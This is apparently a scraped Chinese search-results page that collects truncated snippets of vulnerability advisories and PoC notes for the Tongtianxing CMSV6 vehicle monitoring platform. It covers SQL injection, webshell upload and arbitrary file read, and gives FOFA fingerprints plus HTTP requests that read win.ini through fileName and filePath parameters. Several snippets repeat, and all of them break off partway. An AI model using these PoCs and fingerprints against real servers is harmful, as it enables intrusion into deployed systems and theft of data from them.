漏洞信息 影响产品 解决方案 漏洞描述 通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。 该漏洞是由于通天星CMSV6车载定位监控平台/run...
通天星CMSV6车载视频监控平台存在一个SQL注入漏洞。攻击者可以通过在特定的GET请求中注入恶意SQL代码,利用该漏洞对数据库执行任意SQL操作。漏洞存在于/edu_security_officer/disable;downloadLogger.action接口,攻击者可以在ids参数中注入SQL语句,导致数据库执行时间延迟,从而确认SQL注入的成功。此漏洞可能导致数据库中的敏感...
0x02产品介绍通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核...查看全文 相关企业信息 公司名称:浙江通天星集团股份有限公司 法人代表:王群 注册资本:- 成立时间:1997-12-31 公司类型:股份有限公司(非上市、自然人投资或控股) 经营状态:存续 注册地址: 浙江省衢州市五一路27号1幢 ...
17 changes: 17 additions & 0 deletions 17 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,17 @@ ## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞 ## fofa ``` body="./open/webApi.html"|...
01 漏洞概况 通天星CMSV6 车载定位监控平台upload接口处存在文件上传漏洞,攻击者可通过该漏洞直接上传一个 webshell 到服务器上,获取服务器权限,进⽽控制整个 web 服务器。02 漏洞处置综合处置...查看全文 相关企业信息 公司名称:西安安迈信科科技有限公司 法人代表:李嘉 注册资本:243.68万人民币 成立时间:2020-04...
通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台。 通天星CMSV6车载定位监控平台 downloadLogger.action?ids接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷。 漏洞危害 恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷。
##通天星CMSV6车载视频监控平台downloadLogger接口任意文件读取漏洞 ##fofa ``` body="./open/webApi.html"||body="/808gps/" ``` ##poc ``` GET /808gps/logger/downloadLogger.action?fileName=C://Windows//win.ini HTTP/1.1 Host:127.0.0.1 ...
17 changes: 17 additions & 0 deletions 17 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,17 @@ ## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞 ## fofa ``` body="./open/webApi.html"|...
## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞 ## fofa ``` body="./open/webApi.html"||body="/808gps/" ``` ## poc ``` GET /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1 Host:127.0.0.1 User-Agent:...
17 changes: 17 additions & 0 deletions 17 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞.md Original file line numberDiff line numberDiff line change @@ -0,0 +1,17 @@ ## 鸿运(通天星CMSV6车载)主动安全监控云平台存在任意文件读取漏洞 ## fofa ``` body="./open/webApi.html"|...